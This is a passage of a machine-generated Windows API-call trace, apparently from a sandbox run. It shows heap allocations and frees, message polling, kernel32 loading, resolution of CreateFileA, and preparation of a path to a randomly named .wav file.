out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0187.247] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0187.247] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.247] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0187.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0187.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0187.247] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0187.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0187.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0187.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda98 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0187.248] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0187.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0187.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0187.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0187.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0187.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0187.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0187.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0187.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0187.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0187.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0187.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0187.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0187.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0187.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0187.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0187.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0187.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0187.252] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0187.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0187.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0187.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0187.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0187.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0187.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.255] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0187.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba138 [0187.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba138, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0187.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.256] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0187.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0187.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba138 [0187.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba138, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0187.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.256] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0187.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0187.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0187.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0187.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0187.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav", cchWideChar=92, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 92 [0187.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5c) returned 0x9a5d78 [0187.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav", cchWideChar=92, lpMultiByteStr=0x9a5d78, cbMultiByte=92, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav", lpUsedDefaultChar=0x0) returned 92 [0187.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0187.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0187.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: 